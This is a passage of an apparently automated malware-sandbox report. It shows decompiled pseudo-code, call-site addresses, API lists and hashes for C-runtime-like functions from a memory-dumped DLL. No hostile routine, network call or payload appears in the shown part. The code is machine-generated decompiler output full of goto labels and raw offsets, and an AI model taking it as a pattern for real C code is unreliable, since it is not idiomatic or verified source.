						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6F24AE10(_t107, E6F24CB9D(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6F24AE10(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6f28b184; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6f258154();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6F24F563(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6f287f60);
									E6F24AC90(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6F24CDDF(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6F24DADF(_t103, _t108[0x18], E6F24CB9D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6F24DAEF(_t103, _t108[0x18], E6F24CB9D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6F24CB9D();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                          0x6f24cddf
                          0x6f24cde1
                          0x6f24cde6
                          0x6f24cdeb
                          0x6f24cded
                          0x6f24cdf0
                          0x6f24cdf5
                          0x6f24cf05
                          0x6f24cf05
                          0x6f24cf05
                          0x00000000
                          0x6f24ce04
                          0x6f24ce04
                          0x6f24ce09
                          0x6f24ce13
                          0x6f24ce15
                          0x6f24ce1a
                          0x6f24ce1f
                          0x6f24ce1f
                          0x6f24ce21
                          0x6f24ce24
                          0x6f24ce29
                          0x6f24ce4b
                          0x6f24ce4b
                          0x6f24ce4e
                          0x6f24ce51
                          0x6f24ce6f
                          0x6f24ce72
                          0x6f24ceb1
                          0x6f24ceb4
                          0x6f24ceb7
                          0x6f24cedc
                          0x6f24cede
                          0x00000000
                          0x6f24cee0
                          0x6f24cee0
                          0x6f24cee2
                          0x00000000
                          0x6f24cee4
                          0x6f24cee4
                          0x6f24cee9
                          0x6f24ceed
                          0x6f24ceed
                          0x6f24ceee
                          0x00000000
                          0x6f24ceee
                          0x6f24cee2
                          0x6f24ceb9
                          0x6f24ceb9
                          0x6f24cebb
                          0x00000000
                          0x6f24cebd
                          0x6f24cebd
                          0x6f24cebf
                          0x00000000
                          0x6f24cec1
                          0x6f24ced2
                          0x00000000
                          0x6f24ced7
                          0x6f24cebf
                          0x6f24cebb
                          0x6f24ce74
                          0x6f24ce74
                          0x6f24ce78
                          0x00000000
                          0x6f24ce7e
                          0x6f24ce7e
                          0x6f24ce80
                          0x00000000
                          0x6f24ce86
                          0x6f24ce8d
                          0x6f24ce95
                          0x6f24ce99
                          0x6f24ce9b
                          0x6f24ce9e
                          0x6f24cea3
                          0x6f24cea4
                          0x00000000
                          0x6f24cea4
                          0x6f24ce9e
                          0x00000000
                          0x6f24ce99
                          0x6f24ce80
                          0x6f24ce78
                          0x6f24ce53
                          0x6f24ce53
                          0x00000000
                          0x6f24ce53
                          0x6f24ce30
                          0x6f24ce30
                          0x6f24ce35
                          0x6f24ce3a
                          0x00000000
                          0x6f24ce3c
                          0x6f24ce3e
                          0x6f24ce47
                          0x6f24ce56
                          0x6f24ce58
                          0x6f24cf17
                          0x6f24cf17
                          0x6f24cf1c
                          0x6f24cf1d
                          0x6f24cf1f
                          0x6f24cf24
                          0x6f24cf29
                          0x6f24cf2c
                          0x6f24cf2f
                          0x6f24cf32
                          0x6f24cf3b
                          0x6f24cf3b
                          0x6f24cf34
                          0x6f24cf34
                          0x6f24cf34
                          0x6f24cf3e
                          0x6f24cf42
                          0x6f24cf45
                          0x6f24cf46
                          0x6f24cf47
                          0x6f24cf48
                          0x6f24cf4b
                          0x6f24cf54
                          0x6f24cf54
                          0x6f24cf57
                          0x6f24cf8d
                          0x6f24cf59
                          0x6f24cf59
                          0x6f24cf59
                          0x6f24cf5c
                          0x6f24cf73
                          0x6f24cf73
                          0x6f24cf5c
                          0x6f24cf92
                          0x6f24cf9c
                          0x6f24cfa8
                          0x6f24ce66
                          0x6f24ce66
                          0x6f24ce6b
                          0x6f24ce6c
                          0x6f24cea6
                          0x6f24cead
                          0x6f24cef1
                          0x6f24cef1
                          0x6f24cef8
                          0x6f24cf07
                          0x6f24cf0a
                          0x6f24cf16
                          0x6f24cf16
                          0x6f24ce58
                          0x6f24ce3a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24ce09

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 70ec067f2b4cfc1e939f3998260732978ac18d5336dd6650fc2450222f2ac2b5
                          • Instruction ID: 3c90878cdedb13ab112f82f7c16a755e9143ea8c73e4a7700eb362179b19d47f
                          • Opcode Fuzzy Hash: 70ec067f2b4cfc1e939f3998260732978ac18d5336dd6650fc2450222f2ac2b5
                          • Instruction Fuzzy Hash: 3551E07168560EAFEB1D8F18C840BAA73A4FF04B15F11412BE825976D0DBB5EC58CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2506C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F2506C7(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6F2519B3(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6F250D08(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6F24F8B5(GetLastError());
									_t20 =  *((intOrPtr*)(E6F24F90F()));
								}
								L14:
								return _t20;
							}
							_t20 = E6F250D85(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F24F8B5(GetLastError());
						return  *((intOrPtr*)(E6F24F90F()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6F250D85(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6F250D6B(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                          0x6f2506ce
                          0x6f2506d3
                          0x6f2506f1
                          0x6f2506f3
                          0x6f2506f6
                          0x6f25071f
                          0x6f250727
                          0x6f250729
                          0x6f250742
                          0x6f250745
                          0x6f250748
                          0x6f250756
                          0x6f250763
                          0x6f250768
                          0x6f25076a
                          0x6f250783
                          0x6f250786
                          0x6f250786
                          0x6f25076c
                          0x6f250773
                          0x6f25077e
                          0x6f25077e
                          0x6f250788
                          0x00000000
                          0x6f250788
                          0x6f25074d
                          0x6f250752
                          0x6f250754
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f250754
                          0x6f250732
                          0x00000000
                          0x6f25073d
                          0x6f2506f8
                          0x6f2506fb
                          0x6f2506fe
                          0x6f25070d
                          0x6f250710
                          0x6f2506e7
                          0x6f2506e7
                          0x00000000
                          0x6f2506ea
                          0x6f250704
                          0x6f250709
                          0x6f25070b
                          0x6f25078c
                          0x6f25078c
                          0x00000000
                          0x6f25070b
                          0x6f2506d5
                          0x6f2506da
                          0x6f2506df
                          0x6f2506e1
                          0x6f2506e4
                          0x00000000

                          APIs
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • GetLastError.KERNEL32 ref: 6F25072B
                          • __dosmaperr.LIBCMT ref: 6F250732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6F25076C
                          • __dosmaperr.LIBCMT ref: 6F250773
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 5ddd1617364b2b75dd58579ef2ff1842261e4b7a6569e785a1f0a98499f12714
                          • Instruction ID: 8cf91b65a7e393a378961b381d6a31e8cd35480a0cfd85d86ddf59b16dab9e58
                          • Opcode Fuzzy Hash: 5ddd1617364b2b75dd58579ef2ff1842261e4b7a6569e785a1f0a98499f12714
                          • Instruction Fuzzy Hash: 98216D3160870FAF9B10DFA58C80D6BB7B9EF413AD7049619E8189B680D770FC608F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2557E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F2557E6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f28acf0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F2557CF();
					E6F255791();
					_t13 = WriteConsoleW( *0x6f28acf0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                          0x6f255803
                          0x6f255807
                          0x6f255814
                          0x6f255819
                          0x6f255834
                          0x6f255834
                          0x6f25583a

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000), ref: 6F2557FD
                          • GetLastError.KERNEL32(?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?,?,?,6F254A0D,?), ref: 6F255809
                            • Part of subcall function 6F2557CF: CloseHandle.KERNEL32(FFFFFFFE,6F255819,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?,?), ref: 6F2557DF
                          • ___initconout.LIBCMT ref: 6F255819
                            • Part of subcall function 6F255791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F2557C0,6F255184,?,?,6F254486,?,?,00000000,?), ref: 6F2557A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?), ref: 6F25582E
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: da06af9bc53d01ea8c317492df3cd6b051f94bc54d7d3b443d77698bffc5931b
                          • Instruction ID: b1bee48c11ee73b6da72a9d10fd124a31f93d0d74a6cf20655037891bdf99e3c
                          • Opcode Fuzzy Hash: da06af9bc53d01ea8c317492df3cd6b051f94bc54d7d3b443d77698bffc5931b
                          • Instruction Fuzzy Hash: B1F01C36014629FBCF221F9ACC0DA893F26EF0A7B5B014010FE1889960DB728874DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F25493F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E6F25493F(signed int _a4, void* _a8, signed int _a12, intOrPtr _a16) {
				void* _v5;
				void* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				long _v44;
				char _v48;
				intOrPtr _v52;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t78;
				intOrPtr _t82;
				char _t83;
				signed char _t85;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr _t117;
				signed int _t119;
				struct _OVERLAPPED* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				struct _OVERLAPPED* _t129;
				void* _t132;

				_t114 = _a12;
				_t78 = _a8;
				_v12 = _t78;
				_v16 = _t114;
				_t113 = _a16;
				_t124 = _a4;
				if(_t114 == 0) {
					L36:
					__eflags = 0;
					return 0;
				}
				if(_t78 != 0) {
					_t127 = _t124 >> 6;
					_t123 = (_t124 & 0x0000003f) * 0x38;
					_v20 = _t127;
					_t82 =  *((intOrPtr*)(0x6f28b5e0 + _t127 * 4));
					_v52 = _t82;
					_v24 = _t123;
					_t83 =  *((intOrPtr*)(_t123 + _t82 + 0x29));
					_v5 = _t83;
					__eflags = _t83 - 2;
					if(_t83 == 2) {
						L6:
						_t85 =  !_t114;
						__eflags = _t85 & 0x00000001;
						if((_t85 & 0x00000001) == 0) {
							goto L2;
						}
						L7:
						_t129 = 0;
						__eflags =  *(_t123 + _v52 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E6F25515B(_t124, 0, 0, 2, _t113);
							_t132 = _t132 + 0x14;
						}
						_t90 = E6F2544C3(_t114, _t123, __eflags, _t124, _t113);
						__eflags = _t90;
						if(_t90 == 0) {
							_t117 =  *((intOrPtr*)(0x6f28b5e0 + _v20 * 4));
							_t92 = _v24;
							__eflags =  *((char*)(_t92 + _t117 + 0x28));
							if( *((char*)(_t92 + _t117 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t95 = WriteFile( *(_t92 + _t117 + 0x18), _v12, _v16,  &_v44, _t129);
								__eflags = _t95;
								if(_t95 == 0) {
									_v48 = GetLastError();
								}
								goto L26;
							}
							_t101 = _v5 - _t129;
							__eflags = _t101;
							if(_t101 == 0) {
								E6F254541( &_v48, _t124, _v12, _v16);
								L20:
								goto L13;
							}
							_t104 = _t101 - 1;
							__eflags = _t104;
							if(_t104 == 0) {
								_t103 = E6F254705( &_v48, _t124, _v12, _v16);
								goto L20;
							}
							__eflags = _t104 != 1;
							if(_t104 != 1) {
								goto L32;
							}
							_t103 = E6F25461C( &_v48, _t124, _v12, _v16);
							goto L20;
						} else {
							_t108 = _v5;
							__eflags = _t108;
							if(_t108 == 0) {
								_t103 = E6F254089( &_v48, _t124, _v12, _v16, _t113);
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t96 = _v32;
								__eflags = _t96;
								if(_t96 != 0) {
									_t77 =  &_v28; // 0x6f2527ee
									return _t96 -  *_t77;
								}
								_t87 = _v36;
								__eflags = _t87;
								if(_t87 == 0) {
									_t129 = 0;
									__eflags = 0;
									L32:
									_t119 = _v24;
									_t87 =  *(0x6f28b5e0 + _v20 * 4);
									__eflags =  *(_t119 + _t87 + 0x28) & 0x00000040;
									if(( *(_t119 + _t87 + 0x28) & 0x00000040) == 0) {
										L34:
										 *((char*)(_t113 + 0x1c)) = 1;
										 *((intOrPtr*)(_t113 + 0x18)) = 0x1c;
										 *((char*)(_t113 + 0x24)) = 1;
										 *(_t113 + 0x20) = _t129;
										L3:
										return _t87 | 0xffffffff;
									}
									_t87 = _v12;
									__eflags =  *_t87 - 0x1a;
									if( *_t87 == 0x1a) {
										goto L36;
									}
									goto L34;
								}
								_t120 = 5;
								__eflags = _t87 - _t120;
								if(_t87 != _t120) {
									_t87 = E6F24F8D8(_t87, _t113);
								} else {
									 *((char*)(_t113 + 0x1c)) = 1;
									 *((intOrPtr*)(_t113 + 0x18)) = 9;
									 *((char*)(_t113 + 0x24)) = 1;
									 *(_t113 + 0x20) = _t120;
								}
								goto L3;
							}
							__eflags = _t108 - 1 - 1;
							if(_t108 - 1 > 1) {
								goto L32;
							}
							E6F25445B( &_v48, _v12, _v16);
							goto L13;
						}
					}
					__eflags = _t83 - 1;
					if(_t83 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *((char*)(_t113 + 0x24)) = 1;
				 *(_t113 + 0x20) = 0;
				 *((char*)(_t113 + 0x1c)) = 1;
				 *((intOrPtr*)(_t113 + 0x18)) = 0x16;
				_t87 = E6F2504A5(_t124, _t127, 0, 0, 0, 0, 0, _t113);
				goto L3;
			}







































                          0x6f254947
                          0x6f25494a
                          0x6f25494d
                          0x6f254950
                          0x6f254954
                          0x6f254959
                          0x6f25495e
                          0x6f254b38
                          0x6f254b38
                          0x00000000
                          0x6f254b38
                          0x6f254966
                          0x6f254999
                          0x6f25499c
                          0x6f25499f
                          0x6f2549a2
                          0x6f2549a9
                          0x6f2549ac
                          0x6f2549af
                          0x6f2549b3
                          0x6f2549b6
                          0x6f2549b8
                          0x6f2549be
                          0x6f2549c0
                          0x6f2549c2
                          0x6f2549c4
                          0x00000000
                          0x00000000
                          0x6f2549c6
                          0x6f2549c9
                          0x6f2549cb
                          0x6f2549d0
                          0x6f2549d8
                          0x6f2549dd
                          0x6f2549dd
                          0x6f2549e2
                          0x6f2549e9
                          0x6f2549eb
                          0x6f254a30
                          0x6f254a37
                          0x6f254a3a
                          0x6f254a3f
                          0x6f254a99
                          0x6f254a9b
                          0x6f254a9c
                          0x6f254aa8
                          0x6f254aae
                          0x6f254ab0
                          0x6f254ab8
                          0x6f254ab8
                          0x00000000
                          0x6f254abb
                          0x6f254a45
                          0x6f254a45
                          0x6f254a47
                          0x6f254a89
                          0x6f254a67
                          0x00000000
                          0x6f254a67
                          0x6f254a49
                          0x6f254a49
                          0x6f254a4c
                          0x6f254a77
                          0x00000000
                          0x6f254a77
                          0x6f254a4e
                          0x6f254a51
                          0x00000000
                          0x00000000
                          0x6f254a62
                          0x00000000
                          0x6f2549ed
                          0x6f2549ed
                          0x6f2549f0
                          0x6f2549f2
                          0x6f254a23
                          0x6f254a10
                          0x6f254abe
                          0x6f254ac1
                          0x6f254ac2
                          0x6f254ac3
                          0x6f254ac4
                          0x6f254ac7
                          0x6f254ac9
                          0x6f254b33
                          0x00000000
                          0x6f254b33
                          0x6f254acb
                          0x6f254ace
                          0x6f254ad0
                          0x6f254afe
                          0x6f254afe
                          0x6f254b00
                          0x6f254b03
                          0x6f254b06
                          0x6f254b0d
                          0x6f254b12
                          0x6f254b1c
                          0x6f254b1c
                          0x6f254b20
                          0x6f254b27
                          0x6f254b2b
                          0x6f25498a
                          0x00000000
                          0x6f25498a
                          0x6f254b14
                          0x6f254b17
                          0x6f254b1a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f254b1a
                          0x6f254ad4
                          0x6f254ad5
                          0x6f254ad7
                          0x6f254af2
                          0x6f254ad9
                          0x6f254ad9
                          0x6f254add
                          0x6f254ae4
                          0x6f254ae8
                          0x6f254ae8
                          0x00000000
                          0x6f254ad7
                          0x6f2549f6
                          0x6f2549f8
                          0x00000000
                          0x00000000
                          0x6f254a08
                          0x00000000
                          0x6f254a0d
                          0x6f2549eb
                          0x6f2549ba
                          0x6f2549bc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f2549bc
                          0x6f254968
                          0x6f25496a
                          0x6f254972
                          0x6f254976
                          0x6f25497b
                          0x6f254982
                          0x00000000

                          APIs
                            • Part of subcall function 6F254089: GetConsoleOutputCP.KERNEL32(219C2278,?,00000000,?), ref: 6F2540EC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,?,?,6F2527EE,?), ref: 6F254AA8
                          • GetLastError.KERNEL32(?,6F2527EE,?,}&%o,00000000,?,00000000,6F25267D,?,00000000,00000000,6F288248,0000002C,6F2526EE,?), ref: 6F254AB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorFileLastOutputWrite
                          • String ID: '%o
                          • API String ID: 2915228174-597949757
                          • Opcode ID: b54c32191bbdb45b4ae9a8de5eceb4f88e66d3f5e263e52d3eea287a7b7fc9b0
                          • Instruction ID: 60d30a4b990f413a52a3b8fddc625dd43fd2625454d8e4da22e7f013d877fc58
                          • Opcode Fuzzy Hash: b54c32191bbdb45b4ae9a8de5eceb4f88e66d3f5e263e52d3eea287a7b7fc9b0
                          • Instruction Fuzzy Hash: 1D617D71D1424EAADF018FA888A5EDEFBB9BF0A318F104145E814AA242D371E935CF64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24D3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E6F24D3E0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6F24CCF1(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6F24CCF1(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6F24C537(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6F24C46A(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6F24CFB6(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6F24F563(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
